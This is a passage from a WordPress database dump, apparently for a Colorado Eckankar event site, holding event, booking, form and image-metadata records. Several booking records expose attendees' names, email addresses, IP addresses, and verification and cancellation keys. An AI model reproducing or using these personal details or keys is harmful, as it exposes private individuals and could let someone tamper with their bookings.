Colorado\";}'),(184374,268599,'_form_id','17'),(184375,268599,'_seq_num','20'),(188028,268811,'passster_area_shortcode',''),(184442,265436,'boldgrid_in_page_containers','0'),(189415,268871,'mec_end_time_hour','7'),(189414,268871,'mec_end_date','2023-08-09'),(189410,268871,'mec_start_time_hour','6'),(189411,268871,'mec_start_time_minutes','30'),(189412,268871,'mec_start_time_ampm','PM'),(189413,268871,'mec_start_day_seconds','66600'),(189409,268871,'mec_start_date','2023-08-09'),(189408,268871,'mec_organizer_id','1'),(189407,268871,'mec_dont_show_map','0'),(189406,268871,'mec_location_id','187'),(189405,268871,'mec_color',''),(184453,70845,'passster_area_shortcode',''),(184454,268614,'mec_transaction_id','AYS54080'),(184455,268614,'mec_user_id','1000023'),(184456,268614,'mec_verified','1'),(184457,268614,'mec_verification_key','f1a4753796cb06bcd211a2d5e76dc3d6'),(184458,268614,'mec_cancellation_key','1170cf0c9957a2301dbb243bcbf1fdb9'),(184459,268614,'mec_confirmed','1'),(184460,268614,'mec_event_id','268482'),(184461,268614,'mec_date','1686479400:1686483000'),(184462,268614,'mec_ticket_id',',1,'),(184463,268614,'mec_booking_time','2023-06-10 22:42:57'),(184464,268614,'mec_all_dates','a:0:{}'),(184465,268614,'mec_other_dates','a:0:{}'),(184466,268614,'mec_attention_time','1686479400:1686483000'),(184467,268614,'mec_attention_time_start','1686479400'),(184468,268614,'mec_attention_time_end','1686483000'),(184469,268614,'mec_book_date_submit','20230610224257'),(184470,268614,'mec_booking_location','129'),(184471,268614,'mec_ticket_price_1','0'),(184472,268614,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.45.55\";}}'),(184473,268614,'mec_price','0'),(184474,268614,'mec_gateway','MEC_gateway_free'),(184475,268614,'mec_gateway_label','Free'),(184476,268615,'mec_transaction_id','ZMK94087'),(184477,268615,'mec_user_id','1000085'),(184478,268615,'mec_verified','1'),(184479,268615,'mec_verification_key','45b310355309702d882dc21edcb4397e'),(184480,268615,'mec_cancellation_key','dbc387d4647cd658f8d8ce1688ea401d'),(184481,268615,'mec_confirmed','1'),(184482,268615,'mec_event_id','268482'),(184483,268615,'mec_date','1686479400:1686483000'),(184484,268615,'mec_ticket_id',',1,'),(184485,268615,'mec_booking_time','2023-06-11 01:41:26'),(184486,268615,'mec_all_dates','a:0:{}'),(184487,268615,'mec_other_dates','a:0:{}'),(184488,268615,'mec_attention_time','1686479400:1686483000'),(184489,268615,'mec_attention_time_start','1686479400'),(184490,268615,'mec_attention_time_end','1686483000'),(184491,268615,'mec_book_date_submit','20230611014126'),(184492,268615,'mec_booking_location','129'),(184493,268615,'mec_ticket_price_1','0'),(184494,268615,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:25:\"allanborenstein@yahoo.com\";s:4:\"name\";s:7:\"Allan B\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"67.176.103.90\";}}'),(184495,268615,'mec_price','0'),(184496,268615,'mec_gateway','MEC_gateway_free'),(184497,268615,'mec_gateway_label','Free'),(184498,268616,'mec_transaction_id','DOZ50327'),(184499,268616,'mec_user_id','1000022'),(184500,268616,'mec_verified','1'),(184501,268616,'mec_verification_key','08a6e0754c026b70fbdb25e72d10d85c'),(184502,268616,'mec_cancellation_key','87b93a2c67adc7a54015a75933e2d2c9'),(184503,268616,'mec_confirmed','1'),(184504,268616,'mec_event_id','268482'),(184505,268616,'mec_date','1686479400:1686483000'),(184506,268616,'mec_ticket_id',',1,'),(184507,268616,'mec_booking_time','2023-06-11 09:52:30'),(184508,268616,'mec_all_dates','a:0:{}'),(184509,268616,'mec_other_dates','a:0:{}'),(184510,268616,'mec_attention_time','1686479400:1686483000'),(184511,268616,'mec_attention_time_start','1686479400'),(184512,268616,'mec_attention_time_end','1686483000'),(184513,268616,'mec_book_date_submit','20230611095230'),(184514,268616,'mec_booking_location','129'),(184515,268616,'mec_ticket_price_1','0'),(184516,268616,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"73.20.10.25\";}}'),(184517,268616,'mec_price','0'),(184518,268616,'mec_gateway','MEC_gateway_free'),(184519,268616,'mec_gateway_label','Free'),(184520,268617,'mec_transaction_id','VTM37468'),(184521,268617,'mec_user_id','1000086'),(184522,268617,'mec_verified','1'),(184523,268617,'mec_verification_key','9e39ef5a9a4d781324989af3a7965964'),(184524,268617,'mec_cancellation_key','ff0ac620e220dba1ebbca1b94d098d01'),(184525,268617,'mec_confirmed','1'),(184526,268617,'mec_event_id','268482'),(184527,268617,'mec_date','1686479400:1686483000'),(184528,268617,'mec_ticket_id',',1,'),(184529,268617,'mec_booking_time','2023-06-11 10:20:09'),(184530,268617,'mec_all_dates','a:0:{}'),(184531,268617,'mec_other_dates','a:0:{}'),(184532,268617,'mec_attention_time','1686479400:1686483000'),(184533,268617,'mec_attention_time_start','1686479400'),(184534,268617,'mec_attention_time_end','1686483000'),(184535,268617,'mec_book_date_submit','20230611102009'),(184536,268617,'mec_booking_location','129'),(184537,268617,'mec_ticket_price_1','0'),(184538,268617,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"agstreet11@gmail.com\";s:4:\"name\";s:13:\"A Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.45.55\";}}'),(184539,268617,'mec_price','0'),(184540,268617,'mec_gateway','MEC_gateway_free'),(184541,268617,'mec_gateway_label','Free'),(184542,268618,'mec_transaction_id','FDM78046'),(184543,268618,'mec_user_id','1000087'),(184544,268618,'mec_verified','1'),(184545,268618,'mec_verification_key','1ddbe99f65b69311005916d3d3e79237'),(184546,268618,'mec_cancellation_key','d6c51ce1ac75ba1c4ce48067fbbf8b54'),(184547,268618,'mec_confirmed','1'),(184548,268618,'mec_event_id','268482'),(184549,268618,'mec_date','1686479400:1686483000'),(184550,268618,'mec_ticket_id',',1,'),(184551,268618,'mec_booking_time','2023-06-11 10:22:39'),(184552,268618,'mec_all_dates','a:0:{}'),(184553,268618,'mec_other_dates','a:0:{}'),(184554,268618,'mec_attention_time','1686479400:1686483000'),(184555,268618,'mec_attention_time_start','1686479400'),(184556,268618,'mec_attention_time_end','1686483000'),(184557,268618,'mec_book_date_submit','20230611102239'),(184558,268618,'mec_booking_location','129'),(184559,268618,'mec_ticket_price_1','0'),(184560,268618,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"billybobvak@yahoo.com\";s:4:\"name\";s:16:\"Marc Maqssengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"71.205.44.29\";}}'),(184561,268618,'mec_price','0'),(184562,268618,'mec_gateway','MEC_gateway_free'),(184563,268618,'mec_gateway_label','Free'),(184564,268619,'mec_transaction_id','QGV17111'),(184565,268619,'mec_user_id','1000007'),(184566,268619,'mec_verified','1'),(184567,268619,'mec_verification_key','3c0617c5a461390c5b8b670cf6384ea3'),(184568,268619,'mec_cancellation_key','843e52e88a8539becba7b22a3d10f6e0'),(184569,268619,'mec_confirmed','1'),(184570,268619,'mec_event_id','268482'),(184571,268619,'mec_date','1686479400:1686483000'),(184572,268619,'mec_ticket_id',',1,'),(184573,268619,'mec_booking_time','2023-06-11 10:26:37'),(184574,268619,'mec_all_dates','a:0:{}'),(184575,268619,'mec_other_dates','a:0:{}'),(184576,268619,'mec_attention_time','1686479400:1686483000'),(184577,268619,'mec_attention_time_start','1686479400'),(184578,268619,'mec_attention_time_end','1686483000'),(184579,268619,'mec_book_date_submit','20230611102637'),(184580,268619,'mec_booking_location','129'),(184581,268619,'mec_ticket_price_1','0'),(184582,268619,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:15:\"Marc massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"71.205.44.29\";}}'),(184583,268619,'mec_price','0'),(184584,268619,'mec_gateway','MEC_gateway_free'),(184585,268619,'mec_gateway_label','Free'),(184586,268620,'_wp_attached_file','2023/06/2023-regional-brochure-and-registration-web.pdf'),(184587,268620,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:51:\"2023-regional-brochure-and-registration-web-pdf.jpg\";s:5:\"width\";i:1440;s:6:\"height\";i:1120;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:250196;}s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"2023-regional-brochure-and-registration-web-pdf-252x196.jpg\";s:5:\"width\";i:252;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13002;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"2023-regional-brochure-and-registration-web-pdf-1024x796.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131463;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"2023-regional-brochure-and-registration-web-pdf-150x117.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6171;}}s:8:\"filesize\";i:1831686;}'),(184803,267776,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(184804,267776,'_oembed_time_17282f16a653c991eb4e3d6f9f01f652','1687106564'),(184807,268657,'_wp_attached_file','2023/06/2023-regional-sas-webpromo-bk-1.jpg'),(184808,268657,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1185;s:6:\"height\";i:435;s:4:\"file\";s:43:\"2023/06/2023-regional-sas-webpromo-bk-1.jpg\";s:8:\"filesize\";i:81633;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:43:\"2023-regional-sas-webpromo-bk-1-350x128.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7066;}s:5:\"large\";a:5:{s:4:\"file\";s:44:\"2023-regional-sas-webpromo-bk-1-1024x376.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42187;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:43:\"2023-regional-sas-webpromo-bk-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3964;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:43:\"2023-regional-sas-webpromo-bk-1-768x282.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26415;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:43:\"2023-regional-sas-webpromo-bk-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12465;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:43:\"2023-regional-sas-webpromo-bk-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18937;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:43:\"2023-regional-sas-webpromo-bk-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13299;}s:8:\"tileview\";a:5:{s:4:\"file\";s:43:\"2023-regional-sas-webpromo-bk-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16569;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(184590,268623,'_edit_lock','1689738392:2'),(184591,268623,'_edit_last','2'),(184592,268624,'_field_224','Joseph'),(184593,268624,'_field_225','Riley'),(184594,268624,'_field_226','riley.joseph.michael@gmail.com'),(184595,268624,'_field_227','CO'),(184596,268624,'_field_228','US'),(184597,268624,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(184598,268624,'_form_id','21'),(184599,268624,'_seq_num','177'),(184600,268633,'protect_children',''),(184601,268633,'mec_color',''),(184602,268633,'mec_location_id','129'),(184603,268633,'mec_dont_show_map','0'),(184604,268633,'mec_organizer_id','1'),(184605,268633,'mec_read_more',''),(184606,268633,'mec_more_info',''),(184607,268633,'mec_more_info_title',''),(184608,268633,'mec_more_info_target','_self'),(184609,268633,'mec_cost',''),(184610,268633,'mec_currency','a:0:{}'),(184611,268633,'mec_additional_organizer_ids','a:0:{}'),(184612,268633,'mec_additional_location_ids','a:0:{}'),(184613,268633,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-25\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-25\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"20\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(184614,268633,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.4\";s:11:\"end_at_date\";s:0:\"\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(184615,268633,'mec_certain_weekdays','a:0:{}'),(184616,268633,'mec_allday','0'),(184617,268633,'one_occurrence','0'),(184618,268633,'mec_hide_time','0'),(184619,268633,'mec_hide_end_time','0'),(184620,268633,'mec_comment',''),(184621,268633,'mec_timezone','global'),(184622,268633,'mec_countdown_method','global'),(184623,268633,'mec_public','1'),(184624,268633,'mec_start_date','2023-06-25'),(184625,268633,'mec_start_time_hour','12'),(184626,268633,'mec_start_time_minutes','0'),(184627,268633,'mec_start_time_ampm','PM'),(184628,268633,'mec_start_day_seconds','43200'),(184629,268633,'mec_end_date','2023-06-25'),(184630,268633,'mec_end_time_hour','1'),(184631,268633,'mec_end_time_minutes','20'),(184632,268633,'mec_end_time_ampm','PM'),(184633,268633,'mec_end_day_seconds','48000'),(184634,268633,'mec_repeat_status','1'),(184635,268633,'mec_repeat_type','advanced'),(184636,268633,'mec_repeat_interval','1'),(184637,268633,'mec_repeat_end','occurrences'),(184638,268633,'mec_repeat_end_at_occurrences','11'),(184639,268633,'mec_repeat_end_at_date',''),(184640,268633,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.4\";}'),(184641,268633,'mec_in_days',''),(184642,268633,'mec_not_in_days',''),(184643,268633,'mec_hourly_schedules','a:0:{}'),(184644,268633,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(184645,268633,'mec_tickets','a:0:{}'),(184646,268633,'mec_fees_global_inheritance','1'),(184647,268633,'mec_fees','a:0:{}'),(184648,268633,'mec_ticket_variations_global_inheritance','1'),(184649,268633,'mec_ticket_variations','a:0:{}'),(184650,268633,'mec_reg_fields_global_inheritance','1'),(184651,268633,'mec_reg_fields','a:0:{}'),(184652,268633,'mec_bfixed_fields','a:0:{}'),(184653,268633,'mec_op','a:0:{}'),(184654,268633,'mec_fields','a:0:{}'),(184655,268633,'mec_event_status','EventScheduled'),(184656,268633,'mec_moved_online_link',''),(184657,268633,'mec_cancelled_reason',''),(184658,268633,'mec_display_cancellation_reason_in_single_page',''),(184659,268633,'boldgrid_hide_page_title','0'),(184660,268633,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(184661,268633,'passster_activate_global_protection',NULL),(184662,268633,'passster_activate_protection',NULL),(184663,268633,'passster_protection_type','password'),(184664,268633,'boldgrid_in_page_containers','1'),(184667,268633,'_dp_original','268250'),(184666,268633,'passster_area_shortcode',''),(184668,268633,'_edit_lock','1686948110:2'),(184669,268633,'_edit_last','2'),(184670,268634,'_wp_attached_file','2023/06/shariyat-book-1.jpg'),(184671,268634,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:759;s:6:\"height\";i:427;s:4:\"file\";s:27:\"2023/06/shariyat-book-1.jpg\";s:8:\"filesize\";i:86301;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"shariyat-book-1-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18155;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"shariyat-book-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6717;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"shariyat-book-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21668;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"shariyat-book-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36534;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"shariyat-book-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25619;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"shariyat-book-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25099;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(184672,268633,'_thumbnail_id','268634'),(184673,268634,'original-file','2023/06/shariyat-book-1-updraft-pre-smush-original.jpg'),(184674,268634,'smush-complete','1'),(184675,268634,'smush-info','The file was compressed from 84.28 KB to 81.97 KB saving 2.74 percent using WP-Optimize'),(184676,268634,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:86301;s:12:\"smushed-size\";i:83933;s:15:\"savings-percent\";d:2.7400000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:86301;s:10:\"compressed\";i:83933;}s:6:\"medium\";a:2:{s:8:\"original\";i:18155;s:10:\"compressed\";i:18155;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6717;s:10:\"compressed\";i:6717;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21668;s:10:\"compressed\";i:21668;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:36534;s:10:\"compressed\";i:36351;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:25619;s:10:\"compressed\";i:25560;}s:8:\"tileview\";a:2:{s:8:\"original\";i:25099;s:10:\"compressed\";i:25094;}}}'),(184680,268637,'_edit_last','2'),(184679,268637,'_edit_lock','1687288649:2'),(188108,268835,'mec_countdown_method','global'),(188109,268835,'mec_public','1'),(188110,268835,'mec_start_date','2023-08-09'),(188111,268835,'mec_start_time_hour','1'),(188112,268835,'mec_start_time_minutes','0'),(188113,268835,'mec_start_time_ampm','PM'),(188114,268835,'mec_start_day_seconds','46800'),(188115,268835,'mec_end_date','2023-08-09'),(188116,268835,'mec_end_time_hour','2'),(188117,268835,'mec_end_time_minutes','30'),(188118,268835,'mec_end_time_ampm','PM'),(188119,268835,'mec_end_day_seconds','52200'),(188120,268835,'mec_repeat_status','0'),(188121,268835,'mec_repeat_type',''),(188122,268835,'mec_repeat_interval','1'),(188123,268835,'mec_repeat_end',''),(188124,268835,'mec_repeat_end_at_occurrences',''),(188125,268835,'mec_repeat_end_at_date',''),(188126,268835,'mec_advanced_days','a:0:{}'),(188127,268835,'mec_in_days',''),(188128,268835,'mec_not_in_days',''),(188129,268835,'mec_hourly_schedules','a:0:{}'),(188130,268835,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188131,268835,'mec_tickets','a:0:{}'),(188132,268835,'mec_fees_global_inheritance','1'),(188133,268835,'mec_fees','a:0:{}'),(188134,268835,'mec_ticket_variations_global_inheritance','1'),(188135,268835,'mec_ticket_variations','a:0:{}'),(188136,268835,'mec_reg_fields_global_inheritance','1'),(188137,268835,'mec_reg_fields','a:0:{}'),(188138,268835,'mec_bfixed_fields','a:0:{}'),(188139,268835,'mec_op','a:0:{}'),(188140,268835,'mec_fields','a:0:{}'),(188141,268835,'mec_event_status','EventScheduled'),(188142,268835,'mec_moved_online_link',''),(188143,268835,'mec_cancelled_reason',''),(188144,268835,'mec_display_cancellation_reason_in_single_page',''),(188145,268835,'boldgrid_hide_page_title','0'),(188146,268835,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(188147,268835,'passster_activate_global_protection',NULL),(188148,268835,'passster_activate_protection',NULL),(188149,268835,'passster_protection_type','password'),(188150,268835,'boldgrid_in_page_containers','1'),(188151,268835,'passster_area_shortcode',''),(188152,268835,'_wp_old_date','2023-01-14'),(188153,268835,'mec_cost_auto_calculate','0'),(188154,268835,'mec_style_per_event','global'),(188155,268835,'mec_trailer_url',''),(188156,268835,'mec_trailer_title',''),(188157,268835,'mec_start_datetime','2023-08-09 01:00 PM'),(188158,268835,'mec_end_datetime','2023-08-09 02:30 PM'),(188159,268835,'mec_sequence','18'),(188160,268835,'mec_event_gallery','a:0:{}'),(188161,268835,'mec_related_events','a:0:{}'),(188162,268835,'mec_banner','a:0:{}'),(188163,268835,'_thumbnail_id','268836'),(188165,268835,'_dp_original','268797'),(188166,268835,'_edit_lock','1691169782:2'),(188167,268835,'_edit_last','2'),(188168,268836,'_wp_attached_file','2023/07/PurpleScape.webp'),(188169,268836,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:24:\"2023/07/PurpleScape.webp\";s:8:\"filesize\";i:10048;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"PurpleScape-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3920;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"PurpleScape-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2054;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:24:\"PurpleScape-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4522;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:24:\"PurpleScape-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7734;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:24:\"PurpleScape-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7150;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:24:\"PurpleScape-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5520;}s:8:\"tileview\";a:5:{s:4:\"file\";s:24:\"PurpleScape-300x338.